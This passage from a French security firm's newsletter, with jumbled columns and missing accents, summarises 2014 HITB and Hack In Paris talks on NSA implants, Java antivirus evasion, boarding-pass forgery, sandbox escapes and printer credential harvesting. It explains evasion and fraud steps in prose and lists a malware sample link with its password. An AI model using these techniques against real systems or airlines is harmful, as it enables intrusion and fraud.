milliards dordinateurs lutilisent).

+Nom de code : Trinity


Avec la version de Java 7 Update 51 (7u51), le niveau de
scurit de Java peut tre considr comme bon. De nom-
Utilit : metteur-rcepteur de taille miniature utilis par breuses fonctionnalits ont t implmentes par Oracle :
lquipe dintervention dlite de la NSA (TAO)
Configuration Open Source: ARM (arduino ou BeagleBone
Black) + FPGA
+ Blocage des applets non signes et auto-signes sur le
paramtre Scurit leve ;
Analyse de lorateur : sa particularit est sa taille mini-
maliste. Il est impossible de raliser un gadget quiva-
lent, dune taille aussi rduite, avec des composants Open
+Attribut de droit daccs exig pour le paramtre Scu-
rit leve ;
Source.

+ Nom de code : Ironchef


+Avertissement des utilisateurs en cas dattributs de droit
daccs manquants pour le paramtre Scurit moyenne.
Utilit : permet de communiquer au niveau du BIOS avec
des implants RF (communication de courte porte) Malgr toutes ces amliorations, il reste encore un norme
Configuration Open Source: ARM (arduino ou BeagleBone trou de scurit : lutilisateur. La seule dfense face ce
Black) problme est donc lutilisation dun antivirus afin de pallier
Analyse de lorateur : ce type dappareil est vraiment aux incomptences des utilisateurs.
tonnant. Il permet de compromettre un ordinateur trs
bas niveau.

+ Nom de code : Crossbeam


Utilit : module dcoute de conversation GSM
Configuration Open Source : Ironchef + module GSM
Analyse de lorateur : Il existe de nombreux modules GSM
compatibles avec la plateforme Arduino.

+ Nom de code : Cotonmouth


Utilit : plug miniature qui tablit, via un port USB, un accs
au rseau interne cibl
Configuration Open Source : Trinity + USB full speed
Analyse de lorateur : ce gadget est remarquable de par sa
taille miniature. Il montre lavance spectaculaire ralise
par la NSA dans le domaine de la miniaturisation. 25

Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
Le but de la confrence tait donc de prsenter de nou- toutes les applets contenues dans la page.
velles techniques pour chapper aux antivirus, via leurs
mcanismes de dtection par signature. Les prsentateurs
ont donc pris comme exemple la vulnrabilit rfrence
+ getApplet(Stringname) : retourne un objet correspon-
dant une applet spcifique.
CVE-2012-4681 notamment utilise au sein du pack dex-
ploitation BlackHole. En combinant ces deux mthodes, il est donc possible dac-
cder lensemble des mthodes publiques de toutes les
Lide principale pour contourner les antivirus est de scin- applets prsentes sur la page. Il est donc possible dexcu-
der le code dexploitation originel en de multiples sous-pro- ter du code partir dune applet diffrente.
grammes ou plus prcisment, des applets. En effet, lors de
lexcution de plusieurs applets sur une mme page Inter- Pour ordonnancer lexcution de toutes les applets, il suffit
net, ces derniers partagent leur espace mmoire. Chaque de crer une applet spcifique jouant le rle de chef dor-
applet ralisera donc une seule fonctionnalit. chestre. Pour cela, cet appel tablira un canal dchange
entre toutes les applets prsentes sur la page. Chaque ap-
plet chargera lapplet spcifique au canal dchange. Une
fois charge, chaque applet se placera en attente des ins-
tructions la concernant. Pour cela, chaque applet communi-
quera donc au canal de communication la prochaine classe
excuter.

Lide de cette technique, savoir de faire communiquer


plusieurs applets entre-elles, est de sassurer quelles
soient excutes dans lordre attendu.

> Live Connect

Cette technique permet de dporter le stockage des va-


riables de type string ou constante dans du code Ja-
vaScript. Cest gnralement ce type de variables qui est
identifi par les antivirus, car il contient les charges utiles
malveillantes. Voici quelques exemples de donnes qui
peuvent interpeller un antivirus :

De cette manire, les antivirus sont obligs danalyser len- + setSecurityManager + acc + sun.awt.sunToolKit
+ file:// = malware
semble des applets de manire simultane pour dtecter
lexploit. La complexit de cette mthode est de coordon- La fonctionnalit LiveConnect permet linteraction entre le
ner le flux dexcution de toutes les applets. Voici les six JavaScript et le Java. Il suffit donc dappliquer les techniques
solutions prsentes par les chercheurs : dobfuscation JavaScript pour faire disparatre les informa-
tions identifies comme malveillantes du ByteCode Java.
> Timers Nanmoins, cette technique ncessite que lexcution de
code JavaScript soit autorise sur le navigateur Internet de
Les navigateurs Internet chargent les applications de ma- la victime.
nire totalement alatoire. La mthode la plus simple, pour
sassurer du bon droulement du flux dexcution est duti-
liser des timers . En effet, en dfinissant un temps assez > Serialisation
long entre chaque excution des applets, un attaquant peut
sassurer de lordre dexcution des diffrentes applets. Une autre technique permettant de rduire les informations
Nanmoins cette mthode nest pas optimise et ne peut contenues au sein du ByteCode Java est lutilisation dune
pas tre applique pour des exploits complexes. technique dite de srialisation. Cette mthode, introduite
au sein du JDK 11, vise rendre un objet ou une class stoc-
kable. Lobjet srialis est donc converti en une srie doc-
> Applets Context tets (valeur binaire). Cette transformation peut seffectuer
dans les deux sens et permet ainsi le transfert dun objet
Une autre approche est dutiliser des interfaces Java appe- dune applet une autre par exemple.
les AppletContext . Ces interfaces permettent dobtenir
des informations sur lenvironnement dans lequel lapplet Avec cette mthode, lexploitation de cette vulnrabilit
est excute. Deux mthodes particulirement utiles sont seffectuera en 2 temps :
mises disposition :

+
26 +
La premire tape consiste srialiser lensemble des
getApplets() : renvoie une liste comportant le nom de classes ralisant les actions malveillantes (classes pouvant

Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
HITB

potentiellement tre dtectes par lantivirus comme mal- tre contournes, pour peu que lon ait la motivation et
veillantes). les moyens ncessaires. Il est donc prfrable de dsactiver
Java et dinterdire son installation sur un poste utilisateur.
+ Ensuite, il suffit dimporter les sries doctets gnrs
par la srialisation et de les dsrialiser la vole.
Si Java est rellement ncessaire pour lutilisateur, il faut
sassurer que toutes les anciennes versions de Java soient
dsinstalles et que les paramtres de scurit soient confi-
De plus, les donnes srialises peuvent tre offusques. gurs sur haut .
Nanmoins, cette partie na pas t aborde lors de la
confrence. La procdure de gnration du code srialis La confrence sest finie sur 2 anecdotes dmontrant, si cela
et son remplacement au sein du nouvel exploit peuvent tait encore ncessaire, les faiblesses de Java et des anti-
facilement tre automatiss. virus :

> Plusieurs JVM


+ Lorsque Java met jour une nouvelle version majeure
(1.5/1.6 ), il ne supprime pas lancienne version. Il est
donc possible dexcuter une applet sous une version plus
Une application Java ne sexcute pas directement sur le ancienne de Java
systme, mais au sein dune machine virtuelle appele
JVM (Java Virtual Machine). Cest cet environnement Java
qui permet dexcuter du ByteCode Java. Cette architecture
+ Lors de leur test, les deux chercheurs ont remarqu un
comportement assez intressant de la part dun antivirus.
permet lexcution dune application Java sous nimporte Ce dernier a dtect un binaire Java malveillant en le si-
quel systme dexploitation. gnalant lutilisateur, mais na pas stopp son excution
Afin de distribuer lexcution de lexploit, il suffit de spci-
fier une nouvelle JVM pour chaque applet de la page avec
le paramtre nomm separate_jvm .
Pour pouvoir communiquer entre les diffrentes JVM, il suffit
dutiliser des scripts JavaScript hbergs sur la mme page.
Cette mthode relativement simpliste permet de contour-
ner de manire efficace tous les antivirus du march.

> XOrigin

Lensemble des mthodes prsentes contraignait lutilisa-


tion dun seul domaine. En effet, la sandbox Java concer-
nant les applets Java nautorise pas la communication de
plusieurs applets hbergs sur diffrents domaines.

Pour contourner cette restriction, il suffit dutiliser une


fonctionnalit fournie par le langage JavaScript nomme
X-Origin (Cross Origin). Elle permet la communication
entre deux scripts JavaScript hbergs sur 2 domaines dif-
frents.

Cette mthode permet donc de distribuer la rpartition des


exploits travers diffrents domaines.

> Conclusion

Lutilisation de ces mthodes permet de rendre indtec-


table tout exploit Java aux yeux des antivirus. Les cher-
cheurs ont rappel cette occasion quil ne faut donc pas
reposer uniquement la scurit de lentreprise en em-
ployant des boitiers magiques (IPS / IDS / antivirus) aux
cots prohibitifs. Toutes ces protections peuvent toujours 27

Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
Exploiting Passbook to Fly for Free ). Lensemble des marqueurs peut tre ainsi identifi de
Anthony Hariton (Undergraduate Student, University of manire assez triviale. Pour finaliser le billet, il faut faire at-
Crete) tention certains dtails anodins comme lencodage utilis
par la compagnie arienne.
+ Slides
http://haxpo.nl/wp-content/uploads/2014/02/D2T1-Ex-
ploiting-Passbook-to-Fly-for-Free.pdf

Cette prsentation, sans grande prtention technique, a t


la prsentation la plus drle des deux jours de confrence.
En effet, Anthony Hariton a dtaill avec beaucoup dhu-
mour toutes les tapes permettant de frauder lembar-
quement dans un aroport. Il a dmontr quil tait pos-
sible de forger des tickets virtuels et quavec une goutte de
social engineering et beaucoup de culot, il tait possible de
voyager sans dbourser un sou.
Une fois le faux billet cr, il est ncessaire de se faire ajou-
La premire tape est de trouver des anciens billets de la ter sur le manifeste du vol (liste contenant lensemble des
compagnie arienne vise afin didentifier la disposition et personnes pouvant embarquer dans lavion) par les h-
la charte graphique utilise. Ensuite, lutilisateur va utiliser tesses. La mthode la plus effective est de tenter de sen-
loutil nomm Passkit, qui est disponible gratuitement sur registrer au travers des bornes automatiques. Pour cela, il
Internet, pour forger son propre billet sur son Smartphone. est ncessaire dappeler une htesse et de lui expliquer
Lutilisateur va donc remplir lensemble des champs n- que lenregistrement sur la borne ne fonctionne pas. En lui
cessaire pour crer le billet (date, nom du passager, sige montrant son faux billet et avec un grand sourire, lhtesse
souhait). devrait vous enregistrer et ainsi vous rajouter sur le mani-
feste du vol.

Pour linstant, toutes ces informations sont publiquement


disponibles sur internet. Afin de finaliser le billet, il est n-
cessaire de gnrer un code-barre valide. Cest ce dernier
qui sera scann lors de lenregistrement. Il existe 3 types de
code-barre diffrents :
Lattaque repose sur la confiance que les htesses la porte

+ Code Aztec : code-barre le plus communment utilis


pour les billets lectroniques. Il peut contenir jusqu 3000
denregistrement portent sur le systme informatique. En
effet, elles ne peuvent pas imaginer que les passagers ont
pu crer leur propre billet de manire illicite sur leur propre
caractres encods.
Smartphone. Nanmoins, cette tendance est inverse pour

+ QR code : code-barre le plus connu. Ils sont gnrale-


ment lisibles par un tlphone portable.
les htesses situes au comptoir dembarquement. Il est
donc ncessaire de disposer dun billet imprim.

+PDF417 : ressemble au code-barre traditionnel que lon


trouve dans les grandes surfaces. Il permet notamment
Dernire astuce, les ractions des htesses peuvent tre
prdites avec prcision.
dimprimer beaucoup dinformations sur peu de surface.
Toutes ces dcouvertes ont t prsentes titre duca-
tif bien sr. Nanmoins, Anthony Hariton na pas voulu r-
Dans le cas dAnthony Hariton, il sest intress au code
pondre quand on lui a demand sil avait utilis ces astuces
Aztec. Il a dcouvert que les donnes stockes sur le code-
pour se rendre Amsterdam
barre des billets ne sont pas chiffres. Nanmoins afin
de dterminer la signification de toutes les squences de

chiffres il est ncessaire de disposer dun billet valide. Cette
tape consiste donc identifier les diffrents marqueurs
28 contenus dans le code-barre (Porte, numro de vol, sige

Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
HITB

G-Jacking AppEngine-based Applications CLOSING KEYNOTE: A Clear and Present Danger, Security
Nicolas Collignon & Samir Megueddem (Synacktiv) vs Net Neutrality: Tales from a Telco
Ms Jaya Baloo (Chief Security Officer, KPN Telecom)
+ Slides
http://haxpo.nl/wp-content/uploads/2014/02/
D2T1-G-Jacking-AppEngine-based-Applications.pdf
+ Slides
http://haxpo.nl/wp-content/uploads/2013/12/D2-CLO-
SING-KEYNOTE.pdf

Les fondateurs de Synacktiv, Nicolas Collignon et Samir Me-


gueddem ont prsent des attaques lencontre du service
Cloud nomm Google Cloud Engine (GAE). Pour rappel,
GAE est une plate-forme en tant que service (PaaS) suppor-
tant de nombreux langages. Seules les vulnrabilits lies
au langage Python ont t abordes.

Les deux chercheurs ont introduit larchitecture sur laquelle


repose la plateforme. Il est par exemple possible dinter-
connecter son propre rseau avec celui de Google au travers
des secured connectors .

Tout dabord, les API mises disposition sur la plateforme


ne sont pas toutes scurises par dfaut. Par exemple, lAPI
urlfetch, trs utilise des dveloppeurs, ne vrifie pas la va-
lidit dun certificat SSL. Au travers de ces API, ils ont t Pour la keynote clturant la confrence, Jaya Baloo, CISO de
en mesure dexcuter du code distance (RCE) travers le KPN Telecom, est venue dfendre les oprateurs dans la
protocole XMPP. Dautres vulnrabilits de type dni de ser- guerre actuelle entre la neutralit du net et les obligations
vice ont galement t identifies (Google Screen of Death lgales auxquelles ils sont confronts. Durant cette prsen-
GSOD). Pour contrer ces attaques, Google devrait mettre tation amusante et dcale par rapport au formalisme ha-
disposition des mthodes de liste noire dadresse IP afin de bituellement attendu, elle a tent de nous faire part des
bannir tout attaquant potentiel. efforts mis en oeuvre par son entreprise pour tenter de gar-
der un quilibre juste entre neutralit des rseaux, scurit
Ensuite, ils se sont concentrs sur le contournement de la et vie prive.
sandbox Python mise en place par Google. Cette tche fut
assez simple. La librairie os gnralement utilise pour
lexcution de commandes en Python tait filtre. Ils ont
donc utilis la librairie posix sur laquelle sappuie la
librairie os . Dautres moyens plus complexes furent ga-
lement abords.

Des exemples concrets nous ont permis de mieux com-


prendre le grand cart que les oprateurs doivent parfois
raliser et labsurdit de certaines situations face aux cadres
lgaux actuels.

29

Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
Voici quelques exemples :

+ Ds lors quun utilisateur est connect au rseau SS7,


il est considr de confiance. Il ne subit aucun contrle de
la part du fournisseur . Le rseau SS7 est prsent pour
des raisons historiques. Il est impossible lheure actuelle
dimaginer la suppression de ce protocole.

+ Un oprateur Internet nest pas autoris regarder


le contenu dun texto dun usager, mais un service tiers
peut. KPN a t confront cette situation, car un botnet
simulait son identit. Son moyen de propagation tait via
des messages court (SMS) embarquant une charge visant
changer les paramtres du proxy de lutilisateur. KPN navait
pas le droit dessayer didentifier les SMS malveillants sur
son propre rseau.

+ Un oprateur na pas le droit de dmanteler un bot-


net. Il ne reste pas maitre de son trafic.

+ Un oprateur ne peut se servir des donnes extraites


en cas de dmantlement dun botnet. Ainsi, loprateur
ne peut donc pas prvenir les victimes quelles ont t in-
fectes.

+ Les vendeurs de logiciels et matriel informatique ne


sont pas concerns par les dernires mesures de scurit
qui sont imposes par lEurope. La raison, deux membres
du conseil proviennent de Symantec et Intel.

Rfrences

+[1] http://photos.hitb.org/
+[2] http://conference.hitb.org/

30
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
> Confrences scurit

Hack In Paris
par Romain LEONARD et Etienne BAUDIN

@Hack In Paris
> Jour 1 parons toujours aussi mal larrive des nouvelles tech-
nologies et que plus tt les mesures sont prises, plus elles
KEYNOTE 1 Beyond information ware : Hacking the fu- sont efficaces.
ture of security
Winn Schwartau

+ Slides
https://www.hackinparis.com/sites/hackinparis.com/files/
WinnSchwartau.pdf

Aprs une brve introduction de la Hack in Paris 2014 et


des remerciements aux organisateurs, Winn Schwartau a
introduit sa keynote par une citation rsumant assez bien le
contenu de sa prsentation : Hack early, hack hard!

En effet, il sest attach expliquer pourquoi il faut tes-


ter la scurit des nouvelles technologies ds la phase de
dveloppement pour quelles ne soient pas mises dans
les mains dun public non averti avant dtre scurises.
Il a tir de lHistoire un exemple illustrant ce principe. Le DIGITAL ENERGY - (BPT)
Congrs amricain disait ne pas avoir se proccuper des Paul Coggin
pirates, car ceux-ci ntaient pas suffisamment organiss et
navaient pas les fonds ncessaires pour reprsenter une Paul Coggins, de la socit Digital Energy a ensuite ralis
relle menace. une confrence sur le thme des BPT.

Winn Schwartau a ensuite prsent les technologies aux- Cet expert en scurit ralise rgulirement des audits de
quelles, selon lui, il est ncessaire de sintresser. Il a no- scurit sur les systmes SCADA et leur environnement. Il a
tamment voqu linternet des objets, les drones et autres ainsi mis en vidence des situations relles ou des attaques
micro-drones, les exosquelettes et les prothses ou encore basiques permettant de compromettre trs facilement des
le Bring Your Own Disaster. systmes SCADA critiques.

La conclusion de cette prsentation est que nous nous pr- Selon lui, les attaques exploitant des infrastructures cri-
31

Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
tiques et se basant sur des vecteurs dattaques basiques ne Breaking Through The Bottleneck - Mobile Malware Is
peuvent faire partie des attaques de types APT. Il les classe Outbreak Spreading Like Wildfire
dans les BPT pour Basic Persistent Threats. Thomas Wang (Baidu)

Voici une liste non exhaustive des situations risques quil


a pu rencontrer et quil a dtaill durant cette prsentation :
+ Slides
https://www.hackinparis.com/sites/hackinparis.com/files/
ThomasLeiWang.pdf
+lutilisation de mot de passe par dfaut ; Lobjectif de la prsentation suivante tait de montrer com-
+la sparation faible ou inexistante des services de
contrle, de management et de donnes ;
ment se rpandent les malwares sur les tlphones mo-
biles.

+les problmes de scurit lis au niveau 2 de la couche


du modle OSI ;

+le manque de filtrage des connexions sortantes ;


+le manque de confiance entre les parties ;
+lutilisation doutils distance ;
+lutilisation de configurations de bases de donnes par
dfaut ;

+le manque de politique de scurit autour de lin-


frastructure rseau et scurit des entreprises.
Thomas a commenc par expliquer les principaux objec-
tifs des malwares mobiles, une menace qui a grandi de
prs de 1000% en quelques annes. Ces objectifs sont
simples et semblables ceux des autres malwares : voler
Pour finir, il a indiqu plusieurs recommandations sur cha- de largent (74%), ou encore drober des informations et
cun de ces sujets, ainsi que des points essentiels respec- des ressources (14%). En ralit, ce qui change est la vari-
ter : t des vecteurs dattaque. Il a prsent ensuite la liste des
vecteurs dinfection rencontrs, ainsi que des exemples de
+la mise en liste blanche des applications critiques ; logiciels malveillants qui les ont utiliss.

+la mise en liste blanche des relations de confiance du


point de vue rseau ;

+la mise en liste blanche des flux dinformations critiques.


Fuzzing, Reversing and Maths
Josep Pi Rodriguez et Pedro Guilln Nez

+ Slides
https://www.hackinparis.com/sites/hackinparis.com/files/
JosepPiandPedro.pdf

Ces deux experts en scurit espagnols ont prsent le


fruit de leur travail sur des outils de sauvegarde. Ces ou-
tils, vendus en tant quoutils de scurit, sont critiques pour
les entreprises. Ds lors, la scurit de ces composants est
essentielle. Dautant plus que certains de ces logiciels sont
utiliss par des gants du web.
Les vecteurs prsents taient les suivants :
Or, les dernires vulnrabilits corriges au sein de certains
de ces outils remontent 2008.
+ les magasins dapplication officiels (Dropdialer.A,
XTaoAd.A) ;
Ces outils sont vulnrables des failles de scurit que ces
chercheurs ont pu mettre en valeur laide doutil de fuz-
zing, de mathmatique et de reverse engineering. Ils ont +les magasins dapplication tiers ;
ainsi pu dvelopper des codes dexploitation leur permet-
tant dobtenir un accs sur des sauvegardes enregistres. +les messages (Worm!Samsapo.A) ;
32
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
Hack In Paris 2014

+
Pentesting NoSQL DBs with NoSQL Exploitation
les femtocells (FakeCMCC.A) ; Framework

+les QR Codes (JiFake.A) ;


Francis Alexander

+le Bluetooth (Obad.A) ; + Slides


https://www.hackinparis.com/sites/hackinparis.com/files/

+les firmwares tiers (Oldboot) ;


FrancisAlexander.pdf

+les rseaux sociaux (Opfake.B) ;


Francis Alexander a commenc sa prsentation par une in-
troduction dtaillant les diffrents types de bases de don-

+la publicit (BadNews.A) ;


nes NoSQL et des exemples dimplmentation. Ces diff-
rents types sont les suivants :

+le tlchargement (NotCompatible.A) ; +les stockages par colonnes (HBase, Cassandra) ;


+le connexions USB. + les stockages sous forme de document (MongDB, Couc-
hDB) ;
Ensuite, Thomas a prsent une rpartition des vecteurs
dinfection. Cette rpartition pointe du doigt les magasins
dapplication comme tant le principal vecteur dinfection.
+les stockages par cls ou par tuples (Riak, Redis) ;
Les exemples de malwares prsents sont disponibles
+les bases de donnes sous forme de graphe (Neo4J,
DEX).
ladresse : http://pan.baidu.com/s/1c06E7T2 et le mot de
passe est HIP2014Thomas. Il a ensuite prsent les vulnrabilits connues de certaines
de ces bases de donnes. Malheureusement, ces dmons-
trations taient beaucoup trop rapides et manquaient dune
ARM Aarch64 - Writing Exploits For The New ARM Archi- prsentation de limplmentation vulnrable et des solu-
tecture tions de correction.
Thomas Roth

Pour conclure cette premire journe, le jeune expert en


scurit a prsent les nouveaux lments de scurit in-
troduits loccasion de la sortie de la nouvelle architecture
ARM AArch 64.

Enfin, il a fait une brve prsentation de son outil, un


framework de dtection et dexploitation de failles NoSQL.
Cet outil est open source, crit en python et supporte ac-
tuellement les bases MongoDB, CouchDB, Redis-Base et
Cassandra. Le projet est disponible sur nosqlproject.com.

Fin 2013, les premiers priphriques utilisant la dernire


gnration de processeur ARM 64 bits sont apparus. Cette
prsentation a permis de dcouvrir les volutions au niveau
de larchitecture du systme. Le chercheur a ainsi montr
les consquences de ces volutions au niveau de lespace
mmoire, ainsi que les consquences en termes de cration
de code dexploitation, ciblant aussi bien lespace mmoire
utilisateur que celui du noyau. 33

Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
Biting Into The Forbidden Fruit. Lessons From Trusting Setup for Failure : Defeating UEFI/Win8 SecureBoot
Javascript Crypto John Butterworth (speaker) and his team (Corey Kallenberg,
Krzysztof Kotowicz (Google) Sam Cornwell and Xeno Kovah)

+ Slides
http://fr.slideshare.net/kkotowicz/biting-into-the-forbid-
+ Slides
https://www.hackinparis.com/sites/hackinparis.com/files/
den-fruit-lessons-from-trusting-javascript-crypto# JohnButterworth.pdf

Cet expert en scurit travaillant chez Google a prsent le John Butterworth a commenc sa prsentation par une ex-
fruit de ses recherches sur le niveau de scurit rellement plication de la Malware food chain avant la mise en
apport par les outils de cryptographie implments en Ja- place des nouvelles scurits. En effet, lpoque du BIOS,
vaScript. les malwares taient capables, aprs avoir compromis le
systme, de compromettre le MBR et le BIOS pour sassurer
Il a dmontr que la cryptographie au sein de JavaScript de leur persistance..
avait beaucoup progresse. Nanmoins, de nombreuses
vulnrabilits, lies au langage et aux plateformes web,
sont toujours prsentes et difficiles corriger.

Daprs ses spcifications, lUEFI introduit des mcanismes


permettant de prvenir de telles attaques. Mais certains
constructeurs ont pris des liberts dans leurs implmenta-
tions pour se simplifier la vie, introduisant malheureuse-
Ainsi et titre dexemple, un utilisateur malveillant peut ment des failles de scurit.
tre en mesure, par le biais dune attaque de type Cross-
Site Scripting (XSS), de contourner des fonctions de cryp- John Butterworth et son quipe ont donc labor deux
tographie. Il peut alors remplacer la fonction de gnration techniques qui permettent de contourner les protections
de nombre alatoire et exfiltrer en clair des lments chif- normalement apportes par lUEFI sur les produits Dell et
frs. Cette vulnrabilit, souvent peu considre, peut ds ceux dautres constructeurs ayant fait les mmes choix
lors provoquer des dommages similaires ceux quocca- techniques.
sionnerait une vulnrabilit permettant daccder au noyau
pour un systme dexploitation. Daprs leurs recherches, il est possible de contourner la
fonctionnalit baptise Secure boot sur de nombreux
firmwares. Il est mme possible de faire apparatre cette
fonctionnalit comme tant active alors quen fait elle ne
lest pas...

34
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
Hack In Paris 2014

> Jour 2 JSMVCOMFG - To sternly look at JavaScript MVC and Tem-


plating Frameworks
KEYNOTE 2 Around The World In 80 Cons Mario Heiderich

+
Jayson E. Street (Krypton Security)
Slides
Cet expert en scurit, qui dispose dun charisme impres- https://www.hackinparis.com/sites/hackinparis.com/files/
sionnant, a prsent le rsultat de 80 confrences quil a pu MarioHeiderich.pdf
suivre travers le monde.
Mario Heiderich a commenc par prsenter les avantages
Il est ainsi revenu sur lactualit des services secrets dans avancs par les frameworks MVC pour JavaScript :
le monde. Ainsi, il ny aurait pas que les Chinois qui es-
pionneraient. La NSA serait trs prsente galement. Mais Ces frameworks semblent donc faire tout ce dont un dve-
pas seulement, les Canadiens, les Franais, les Anglais, ou loppeur a besoin. Ils permettent de travailler vite, simple-
encore les Allemands ont galement des agences gouver- ment, et de faire plus que ce qui est normalement possible.
nementales ddies ce type de missions despionnage. Qui plus est, ils utilisent une moustache sexy pour leur no-
Il est galement revenu sur le ct culturel de la scurit in- tation {{ Stuff }} (voir mustache.github.io).
formatique. Ainsi un pirate est souvent reprsent comme
un personnage cagoul, se dplaant tel un ninja. Le terme Mais qui dit faire plus, dit aussi avoir une plus grande sur-
hacking est aussi souvent li des activits criminelles dans face dattaque. Cest ce que Mario a dmontr dans la suite
nos socits, alors quil se rapporte souvent des activits de sa prsentation.
thiques et honntes.

En effet, en saidant du projet TodoMVC qui implmente


une Todo-Liste en utilisant diffrents frameworks, Mario a
Il a cit lexemple de la DerbyCon qui avait provoqu une rvl que ces frameworks permettent de contourner les
petite polmique aux tats-Unis, car elle invitait des ex- mcanismes de scurit, permettant normalement de lut-
perts en scurit pour renforcer leurs comptences en ter contre les XSS, implments dans les navigateurs r-
pentest. cents, en permettant dutiliser eval sans avoir faire
appel directement cette fonction, mais en passant par des
moyens dtourns offerts par ces frameworks.
Lobjectif global est toujours de comprendre les mthodes Dailleurs, la plupart dentre eux ne sont pas compatibles
des attaquants et dessayer de les devancer dans la d- avec le dernier mcanisme implment par les naviga-
couverte de vulnrabilits logicielles. Selon lui, ces vne- teurs, cest--dire le CSP. Mieux, certains permettent de
ments ont une importance cruciale pour la scurit de nos contourner cette fonctionnalit.
informations.
Enfin, pour rpondre ce problme, Mario a cr le pro-
jet Mustache Security qui permet de classer ces diffrents
frameworks en fonction de critres de scurit objectifs.

35

Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
Extreme Forensics Reloaded 2Q /2014 Leur outil se base sur un constat rgulirement fait par les
Alvaro Alexander Soto (ASOTO Technology Group) pentesters dans le cadre de tests dintrusion en entreprise:
les imprimantes multifonctions ne sont pas scurises. En
+ Slides
https://www.hackinparis.com/sites/hackinparis.com/files/
effet, il est souvent possible dobtenir un accs un compte
dActive Directory via ces imprimantes. Dans 5% des cas, il
ASOTO.pdf est galement possible dobtenir directement des identi-
fiants dadministrateur du domaine. Dailleurs, pour rendre
Alvaro Alexander Soto a ensuite prsent une confrence leur prsentation plus attractive et appuyer lutilit de leur
traitant du Forensics appliqu. Lobjectif ntait pas de pr- outil, ils ont prsent plusieurs cas pratiques de dtourne-
senter des dtails techniques, mais des anecdotes et des ment de ces imprimantes multifonctions.
cas pratiques rencontrs par sa socit.

Parmi ces exemples, il a notamment prsent des tech-


niques avances visant cacher des donnes sur des
disques durs en changeant les tiquettes afin dindiquer
une taille plus petite, ou encore en dsactivant certaines
ttes de lecture dun disque dur pour que les donnes ne
puissent pas tre lues, par un dd par exemple. Il a ga-
lement prsent, avec humour, une technique de rcup-
ration de mot de passe ncessitant une perceuse et une
chaise en inox disposant dentraves intgres.

Plus srieusement, il a montr des techniques pour accder Loutil sappelle Praeda. Il permet de scanner les rseaux
en ATA des disques durs externes USB en soudant un port la recherche dimprimantes. Il lance ensuite des modules
SATA sur le disque, ou encore des disques durs placs ct spcifiques en fonction du modle et rcupre des donnes
dlectro-aimants afin de les rendre inutilisables si le botier (usernames, passwords, etc.). On utilisera par la suite les in-
de la machine est ouvert. formations rcoltes pour simplanter dans le systme din-
formation. Cet outil devrait bientt sintgrer Metasploit.
Cest pourquoi il nous a rappel la ncessit de former des
experts en forensics comptents dans diffrents domaines
pour faire face des criminels toujours plus ingnieux. Les
domaines en question sont par exemple les systmes dex-
ploitation, les terminaux mobiles... Lobjectif est selon lui
de former des gens capables de voire plus loin que les tech-
niques danalyse classiques.

Plunder, Pillage And Print - The Art Of Leverage Multi-


function Printers During Penetration Testing
Deral Heiland et Pete Arzamendi (Rapid7)

+Slides
https://www.hackinparis.com/sites/hackinparis.com/files/
DeralHeilandandPeterArzamendi.pdf
Ils proposent plusieurs recommandations pour viter les si-
Ces deux experts travaillant pour Rapid7, lditeur du c- tuations risques :
lbre framework dexploitation Metasploit, ont prsent un
nouvel outil quils ont dvelopp. +Modifier des mots de passe administrateurs ;
36
+Raliser du patch management sur les firmwares de ces
quipements ;

Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
Hack In Paris 2014

C++11 metaprogramming technics applied to software


+ Ne pas exposer les interfaces de ces imprimantes sur
Internet ;
obfuscation
Sebastien Andrivet (SCRT)

+Isoler les imprimantes de certains mtiers : ressources


humaines, comptabilits
+ Slides
https://www.hackinparis.com/sites/hackinparis.com/files/
SebastienAndrivet.pdf
Leur outil est disponible ladresse suivante : https://gi-
thub.com/MooseDojo/praedasploit. Aprs une vido dintroduction base dextrait de films de
science-fiction tel que Matrix, Sebastien Andrivet nous a
prsent une mthode dobfuscation des binaires issues de
Energy Fraud And Orchestrated Blackouts/ Issues With code source en C++.
Wireless Metering Protocols (WM-Bus)
Cyrill Brunschwiler (Compass Security)

+ Slides
https://www.hackinparis.com/sites/hackinparis.com/files/
CyrillBrunschwiler.pdf

Cet expert a prsent des problmatiques lies la fraude


lnergie. Il a pour cela prsent le protocole Wireless
M-Bus, qui permet de lire distance des mesures lec-
triques.

Le point de dpart de son projet est une mission danalyse


dun MDM qui lui avait t confie. Entre autres choses, il
devait, pour cette mission, valuer la possibilit de rooter
un tlphone de la flotte contrle par le MDM sans que
celui-ci ne le dtecte. En analysant le binaire de lapplica-
tion, il sest aperu quil lui suffisait de rechercher la chane
de caractre Cydia pour trouver la fonctionnalit vri-
fiant si le systme avait t root . Cette analyse tait
trop simple selon lui et il sest donc lanc dans llaboration
dune mthode dobfuscation.

Dans cette prsentation, le chercheur sest attach analy-


ser les lments de scurit de cet outil. Il a pu, en outre,
montrer des vulnrabilits existantes permettant de mani-
puler les donnes remontes.

Ensuite, aprs une brve introduction des templates C++,


il a expliqu tape par tape lvolution de ses templates.
Le rsultat final permet de chiffrer toutes les chaines de
caractres avec une cl XOR diffrente et de complexifier
les graphes dappels des mthodes.
Le projet est disponible ladresse suivante : https://github.
com/andrivet/ADVobfuscator.
37

Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
Splinter The Rat Attack - Create Your Own Botnet To Ex- Le faible niveau technique de la confrence est amplement
ploit The Network compens par lnergie du speaker et lintrt de son projet
Solomon Sonya pour la recherche.

Solomon Sonya a prsent son Botnet usage ducatif. Le projet est disponible ladresse suivante : https://github.
Ce professeur, langlais impeccable et au talent dora- com/splinterbotnet
teur indniable, a dmarr ce projet afin de permettre aux
chercheurs dtudier le comportement dun Botnet sur un
rseau. DEBAT - Global Surveillance - Security VS Privacy

Enfin, la confrence sest termine sur un dbat organis


avec plusieurs intervenants connus :

+ANNIE MACHON : Ancienne agent du MI5 ;


+ERIC FREYSSINET : chef de la division de lutte contre la
cybercriminalit, Gendarmerie Nationale ;

